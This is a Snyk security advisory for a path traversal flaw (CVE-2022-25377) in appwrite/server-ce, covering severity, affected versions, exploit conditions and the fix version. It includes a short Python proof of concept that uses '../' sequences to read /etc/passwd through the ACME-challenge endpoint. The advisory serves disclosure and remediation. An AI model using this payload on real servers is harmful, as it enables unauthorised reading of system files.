Path Traversal Affecting appwrite/server-ce package, versions >=0.5.0, <0.12.2


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (18th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Path Traversal vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PHP-APPWRITESERVERCE-6276958
  • published26 Feb 2024
  • disclosed23 Feb 2024
  • credit@dubs3c

Introduced: 23 Feb 2024

CVE-2022-25377  (opens in a new tab)
CWE-22  (opens in a new tab)

How to fix?

Upgrade appwrite/server-ce to version 0.12.2 or higher.

Overview

appwrite/server-ce is an End to end backend server for frontend and mobile apps.

Affected versions of this package are vulnerable to Path Traversal due to the ACME-challenge endpoint. An attacker can read arbitrary local files by utilizing directory traversal sequences.

Notes:

  1. This is only exploitable if APP_STORAGE_CERTIFICATES/.well-known/acme-challenge exists on disk, which occurs automatically if the user opts to install Let's Encrypt certificates via the application.

  2. If php is running as root as it is in provided docker environment, the LFI allows for reading any file on the system.

PoC

import urllib.request

### Appwrite Unauthenticated LFI
# Vulnerable versions: 0.5.0 <= 0.12.1
# Date: 2021-12-08
# Author: @dubs3c
# dubell.io
#
# $APP_STORAGE_CERTIFICATES/.well-known/acme-challenge must exist on target's disk

try:
    r = urllib.request.urlopen('http://localhost:8080/.well-known/acme-challenge/../../../../../../../../etc/passwd')
    print(r.read().decode())
except urllib.error.HTTPError as e:
    print(f"[-] Status code {e.status}. Exploit not possible...")

CVSS Scores

version 3.1